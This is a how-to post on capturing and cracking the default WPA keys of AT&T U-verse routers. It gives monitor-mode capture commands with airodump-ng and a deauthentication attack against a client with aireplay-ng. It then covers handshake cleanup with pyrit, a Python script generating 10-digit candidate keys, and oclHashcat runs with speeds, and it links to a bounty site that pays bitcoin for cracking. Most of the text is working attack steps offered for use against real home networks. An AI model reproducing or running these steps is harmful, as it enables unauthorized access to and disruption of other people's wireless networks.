cracking at&t u-verse default wpa1/2 passwords

Cracking AT&T U-verse Default WPA1/2 Passwords.

by Jason WheelerAwesome blog: http://blog.init6.meE

Getting the Handshake

Aircrack's site has a pretty good tutorial.

Boot from Back Track 5 R3

First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode.

#airmon-zc start wlan0

#airodump-ng --encrypt wpa mon0

#airmon-zc stop mon0

Start airmon-zc on the channel of the target.

#airmon-zc start wlan0 <Channel Number>

Then start airodump on the same channel along with some other options.

#airodump-ng mon0 --encrypt wpa --write <FILENAME> --output-format pcap -a --channel <Channel number>

Deauthenticate a client#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

Where:• -0 means deauthentication• 5 is the number of deauths to send• -a 00:14:6C:7E:40:80 is the MAC address of the access point• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are

deauthing• mon0 is the interface name

WPA Handshake

Verify 4-way Handshake

PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)The PTK is a keyed-HMAC function using the PMK on the two MAC addresses and the two nonces from the first two packets of the 4-Way Handshake.

Verify 4-way Handshake

The easy way......

#pyrit -r <FILENAME>.pcap analyze

Strip out the junk.

#pyrit -r <FILENAME>.pcap -o OUTPUT.pcap strip

CAP-2-HCCAPTo turn your pcap file into a hashcat-plus friendly file you can upload it

to https://hashcat.net/cap2hccap/

CRACK!!

Python Scriptimport sys

MAX_INT = 9999999999BAD_PATTERNS = {x * 3 for x in '0123456789'}

for number in xrange(MAX_INT): int_string = str(number).rjust(10, '0') if any(pattern in int_string for pattern in BAD_PATTERNS): continue print ( int_string )

Hashcat-plus$python 2wire.py | ./oclhashcat-plus64.bin -m 2500 -a 0

<filename>.hccap --gpu-accel=160 --gpu-loops=1024

88,770 c/s real or

$./oclhashcat-plus64.bin -m 2500 -a 3 <filename>.hccap --gpu-accel=160 --gpu-loops=1024 -1?d ?1?1?1?1?1?1?1?1?1?1

114K c/s real

Crack for Bitcoin.http://www.hashbounty.net/bounties

sourceshttp://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/Part+II+The+Design+of+Wi-Fi+Security/Chapter+10.+WPA+and+RSN+Key+Hierarchy/